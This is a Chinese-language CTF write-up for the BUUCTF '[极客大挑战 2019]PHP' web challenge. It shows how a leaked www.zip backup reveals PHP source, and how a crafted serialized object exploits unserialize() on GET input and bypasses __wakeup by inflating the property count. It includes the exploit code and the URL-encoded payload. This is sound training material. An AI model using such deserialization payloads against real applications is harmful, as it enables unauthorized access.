BUU-WEB-[极客大挑战 2019]PHP
[极客大挑战 2019]PHP
查看源码没有任何提示,于是爆破一下,看有没有其他子页面。结果爆破出一个www.zip的备份压缩包。
![BUU-WEB-[极客大挑战 2019]PHP_第1张图片](http://img.e-com-net.com/image/info8/bb1ff038e6ce41f9bd0bf978cf8063fd.jpg)
flag.php源码:
$flag = 'Syc{dog_dog_dog_dog}';
?>
(可惜,这不是flag)
index.php部分源码:
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
这里select用了get提交方式,并且做了一次反序列化。
class.php源码:
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "NO!!!hacker!!!";
echo "You name is: ";
echo $this->username;echo "";
echo "You password is: ";
echo $this->password;echo "";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "hello my friend~~sorry i can't give you the flag!";
die();
}
}
}
?>
从这段源码中可以看出我们要构建的password为100,username为admin,才可以获取flag。
尝试构建序列化字符串
class Name
{
private $username = 'admin';
private $password = '100';
}
$a = new Name();
echo urlencode(serialize($a))
?>
//未编码的payload
O:4:"Name":2:{
s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度
O:4:"Name":3:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
//url编码的payload
O:4:%22Name%22:3:{
s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
构建payload为:
?select=O:4:%22Name%22:3:{
s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
![BUU-WEB-[极客大挑战 2019]PHP_第2张图片](http://img.e-com-net.com/image/info8/1377f845c1d2499982949e455d1a77d2.jpg)
flag{
4c823c6c-a3a6-41ee-ae01-acaa7ec7c9fe}